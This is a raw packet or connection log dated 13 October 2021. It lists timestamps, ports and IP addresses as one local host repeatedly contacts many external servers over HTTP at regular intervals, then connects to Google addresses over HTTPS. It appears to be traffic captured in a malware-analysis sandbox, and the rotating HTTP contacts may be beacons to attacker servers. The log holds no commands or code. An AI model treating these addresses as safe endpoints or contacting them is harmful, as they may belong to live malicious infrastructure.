Oct 13, 2021 15:50:02.206046104 CEST	80	49809	142.250.186.179	192.168.11.20
Oct 13, 2021 15:50:07.407438993 CEST	49810	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:50:07.418097973 CEST	80	49810	75.2.115.196	192.168.11.20
Oct 13, 2021 15:50:07.418343067 CEST	49810	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:50:07.418406010 CEST	49810	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:50:07.428858042 CEST	80	49810	75.2.115.196	192.168.11.20
Oct 13, 2021 15:50:07.575223923 CEST	80	49810	75.2.115.196	192.168.11.20
Oct 13, 2021 15:50:07.575305939 CEST	80	49810	75.2.115.196	192.168.11.20
Oct 13, 2021 15:50:07.575583935 CEST	49810	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:50:07.575637102 CEST	49810	80	192.168.11.20	75.2.115.196
Oct 13, 2021 15:50:07.585974932 CEST	80	49810	75.2.115.196	192.168.11.20
Oct 13, 2021 15:50:12.937715054 CEST	49811	80	192.168.11.20	47.88.32.85
Oct 13, 2021 15:50:13.117769957 CEST	80	49811	47.88.32.85	192.168.11.20
Oct 13, 2021 15:50:13.118127108 CEST	49811	80	192.168.11.20	47.88.32.85
Oct 13, 2021 15:50:13.118230104 CEST	49811	80	192.168.11.20	47.88.32.85
Oct 13, 2021 15:50:13.298098087 CEST	80	49811	47.88.32.85	192.168.11.20
Oct 13, 2021 15:50:13.298154116 CEST	80	49811	47.88.32.85	192.168.11.20
Oct 13, 2021 15:50:13.298192024 CEST	80	49811	47.88.32.85	192.168.11.20
Oct 13, 2021 15:50:13.298393965 CEST	49811	80	192.168.11.20	47.88.32.85
Oct 13, 2021 15:50:13.298441887 CEST	49811	80	192.168.11.20	47.88.32.85
Oct 13, 2021 15:50:13.478390932 CEST	80	49811	47.88.32.85	192.168.11.20
Oct 13, 2021 15:50:18.300482035 CEST	49812	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:50:18.434897900 CEST	80	49812	198.59.144.16	192.168.11.20
Oct 13, 2021 15:50:18.435144901 CEST	49812	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:50:18.435197115 CEST	49812	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:50:18.569257975 CEST	80	49812	198.59.144.16	192.168.11.20
Oct 13, 2021 15:50:18.570564985 CEST	80	49812	198.59.144.16	192.168.11.20
Oct 13, 2021 15:50:18.571054935 CEST	49812	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:50:18.582811117 CEST	80	49812	198.59.144.16	192.168.11.20
Oct 13, 2021 15:50:18.583149910 CEST	49812	80	192.168.11.20	198.59.144.16
Oct 13, 2021 15:50:18.705087900 CEST	80	49812	198.59.144.16	192.168.11.20
Oct 13, 2021 15:50:23.683479071 CEST	49813	80	192.168.11.20	198.54.117.211
Oct 13, 2021 15:50:23.850429058 CEST	80	49813	198.54.117.211	192.168.11.20
Oct 13, 2021 15:50:23.850732088 CEST	49813	80	192.168.11.20	198.54.117.211
Oct 13, 2021 15:50:23.850781918 CEST	49813	80	192.168.11.20	198.54.117.211
Oct 13, 2021 15:50:24.017961979 CEST	80	49813	198.54.117.211	192.168.11.20
Oct 13, 2021 15:50:24.018016100 CEST	80	49813	198.54.117.211	192.168.11.20
Oct 13, 2021 15:50:34.093525887 CEST	49814	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:50:34.250809908 CEST	80	49814	198.54.117.210	192.168.11.20
Oct 13, 2021 15:50:34.251652002 CEST	49814	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:50:34.251701117 CEST	49814	80	192.168.11.20	198.54.117.210
Oct 13, 2021 15:50:34.409070015 CEST	80	49814	198.54.117.210	192.168.11.20
Oct 13, 2021 15:50:34.409116030 CEST	80	49814	198.54.117.210	192.168.11.20
Oct 13, 2021 15:50:39.419996977 CEST	49815	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:50:39.583151102 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:39.583508968 CEST	49815	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:50:39.583606958 CEST	49815	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:50:39.754080057 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:39.754148006 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:39.754194975 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:39.754240990 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:39.754277945 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:39.754396915 CEST	49815	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:50:39.754560947 CEST	49815	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:50:39.754580975 CEST	49815	80	192.168.11.20	204.141.43.204
Oct 13, 2021 15:50:39.917299032 CEST	80	49815	204.141.43.204	192.168.11.20
Oct 13, 2021 15:50:44.762470007 CEST	49816	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:50:44.773310900 CEST	80	49816	34.102.136.180	192.168.11.20
Oct 13, 2021 15:50:44.773519039 CEST	49816	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:50:44.773617983 CEST	49816	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:50:44.784272909 CEST	80	49816	34.102.136.180	192.168.11.20
Oct 13, 2021 15:50:44.881392956 CEST	80	49816	34.102.136.180	192.168.11.20
Oct 13, 2021 15:50:44.881464005 CEST	80	49816	34.102.136.180	192.168.11.20
Oct 13, 2021 15:50:44.881805897 CEST	49816	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:50:44.881911039 CEST	49816	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:50:45.184161901 CEST	49816	80	192.168.11.20	34.102.136.180
Oct 13, 2021 15:50:45.195075035 CEST	80	49816	34.102.136.180	192.168.11.20
Oct 13, 2021 15:50:49.887566090 CEST	49817	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:50:49.982944012 CEST	80	49817	66.96.130.148	192.168.11.20
Oct 13, 2021 15:50:49.983311892 CEST	49817	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:50:49.983412027 CEST	49817	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:50:50.078597069 CEST	80	49817	66.96.130.148	192.168.11.20
Oct 13, 2021 15:50:50.095890045 CEST	80	49817	66.96.130.148	192.168.11.20
Oct 13, 2021 15:50:50.095959902 CEST	80	49817	66.96.130.148	192.168.11.20
Oct 13, 2021 15:50:50.096354961 CEST	49817	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:50:50.096431017 CEST	49817	80	192.168.11.20	66.96.130.148
Oct 13, 2021 15:50:50.191598892 CEST	80	49817	66.96.130.148	192.168.11.20
Oct 13, 2021 15:50:55.152597904 CEST	49818	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:50:55.307274103 CEST	80	49818	192.64.116.180	192.168.11.20
Oct 13, 2021 15:50:55.307535887 CEST	49818	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:50:55.307637930 CEST	49818	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:50:55.462980032 CEST	80	49818	192.64.116.180	192.168.11.20
Oct 13, 2021 15:50:55.578366995 CEST	80	49818	192.64.116.180	192.168.11.20
Oct 13, 2021 15:50:55.578438997 CEST	80	49818	192.64.116.180	192.168.11.20
Oct 13, 2021 15:50:55.578645945 CEST	49818	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:50:57.322278023 CEST	49818	80	192.168.11.20	192.64.116.180
Oct 13, 2021 15:50:57.477010965 CEST	80	49818	192.64.116.180	192.168.11.20
Oct 13, 2021 15:51:09.257347107 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.402321100 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.402600050 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.405009985 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.405057907 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.405106068 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.405229092 CEST	49820	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.549832106 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.550007105 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.550115108 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.550209045 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.550256014 CEST	80	49820	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.550357103 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.550462008 CEST	49820	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.550527096 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.550587893 CEST	49820	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.695138931 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.695208073 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.695353031 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.695475101 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.695519924 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.695539951 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.695576906 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.695698023 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.695882082 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.696048975 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.698191881 CEST	80	49820	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.698240042 CEST	80	49820	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.698502064 CEST	49820	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.698551893 CEST	49820	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.840795994 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.840881109 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.840924978 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.840967894 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841038942 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.841078997 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841165066 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.841315031 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841351986 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.841476917 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841511011 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.841558933 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841602087 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841686964 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.841799021 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841876984 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.841897011 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.842003107 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.842046976 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.842099905 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.842236996 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.842353106 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.842394114 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.843445063 CEST	80	49820	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987283945 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987360001 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987416983 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987452030 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987821102 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987909079 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.987946033 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988003969 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988307953 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988387108 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988451004 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988756895 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988831043 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.988867998 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989156961 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989232063 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989269018 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989361048 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989727020 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989801884 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989839077 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989948988 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.989984989 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.991575956 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.991631985 CEST	80	49819	216.189.108.75	192.168.11.20
Oct 13, 2021 15:51:09.991803885 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:09.991866112 CEST	49819	80	192.168.11.20	216.189.108.75
Oct 13, 2021 15:51:14.709038973 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:14.869071960 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:14.869349957 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:14.870745897 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:14.870830059 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:14.870882988 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:14.871057987 CEST	49822	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.030774117 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.030838966 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.030873060 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.031009912 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.031136036 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.031187057 CEST	80	49822	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.031220913 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.031219959 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.031404972 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.031589031 CEST	49822	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.031635046 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.031754017 CEST	49822	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.190957069 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191195965 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.191215038 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191261053 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191313028 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191427946 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.191452980 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191493034 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191611052 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191613913 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.191754103 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.191800117 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.191867113 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.192146063 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.192145109 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.192179918 CEST	80	49822	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.192414045 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.192589045 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.222136974 CEST	80	49822	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.222222090 CEST	80	49822	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.222259998 CEST	80	49822	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.222295046 CEST	80	49822	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.222457886 CEST	49822	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.222515106 CEST	49822	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.351351023 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.351428986 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.351588011 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.351665974 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.351675987 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.351839066 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.351949930 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.351962090 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352082968 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352114916 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352121115 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.352309942 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.352330923 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352454901 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352480888 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.352487087 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352536917 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352567911 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352658987 CEST	49821	80	192.168.11.20	199.34.228.191
Oct 13, 2021 15:51:15.352844000 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352880955 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.352924109 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.353200912 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.353234053 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.353446960 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.353549957 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.353714943 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.511620998 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.511745930 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.512079000 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.512239933 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.512588978 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.512638092 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.512692928 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.512725115 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513092995 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513227940 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513559103 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513603926 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513684034 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513941050 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.513987064 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:15.514841080 CEST	80	49821	199.34.228.191	192.168.11.20
Oct 13, 2021 15:51:40.713439941 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:41.017920971 CEST	80	49823	156.239.224.4	192.168.11.20
Oct 13, 2021 15:51:41.018290043 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:41.018356085 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:41.531142950 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:41.671710014 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:41.841655970 CEST	80	49823	156.239.224.4	192.168.11.20
Oct 13, 2021 15:51:41.981703043 CEST	80	49823	156.239.224.4	192.168.11.20
Oct 13, 2021 15:51:41.981898069 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:42.181415081 CEST	80	49823	156.239.224.4	192.168.11.20
Oct 13, 2021 15:51:42.181706905 CEST	49823	80	192.168.11.20	156.239.224.4
Oct 13, 2021 15:51:42.477792978 CEST	80	49823	156.239.224.4	192.168.11.20
Oct 13, 2021 15:51:46.383301973 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.383379936 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:46.383570910 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.418045998 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.418056011 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:46.451628923 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:46.451905012 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.452670097 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:46.452903032 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.461308002 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.461519003 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:46.461688995 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.463871002 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:46.505897999 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:47.026066065 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:47.026308060 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:47.026371002 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:47.026515961 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:47.026760101 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:47.028512001 CEST	49824	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:51:47.028564930 CEST	443	49824	172.217.168.46	192.168.11.20
Oct 13, 2021 15:51:47.128134966 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.128154039 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.128418922 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.128827095 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.128839016 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.165678978 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.165891886 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.168689013 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.168972015 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.175216913 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.175991058 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.176270008 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.176534891 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.217962980 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.325129032 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.325288057 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.325323105 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.325459957 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.399831057 CEST	49825	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.399868011 CEST	443	49825	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.480339050 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.480392933 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.480581999 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.480897903 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.480909109 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.514537096 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.514676094 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.514755011 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.515212059 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.515463114 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.518640041 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.518768072 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.518949986 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.519321918 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.561923027 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.656441927 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.656611919 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.656652927 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.656688929 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.656884909 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.657007933 CEST	49826	443	192.168.11.20	172.217.168.78
Oct 13, 2021 15:51:47.657053947 CEST	443	49826	172.217.168.78	192.168.11.20
Oct 13, 2021 15:51:47.735865116 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.735893965 CEST	443	49827	172.217.168.33	192.168.11.20
Oct 13, 2021 15:51:47.736057043 CEST	49827	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:51:47.736287117 CEST	49827	443	192.168.11.20	172.217.168.33
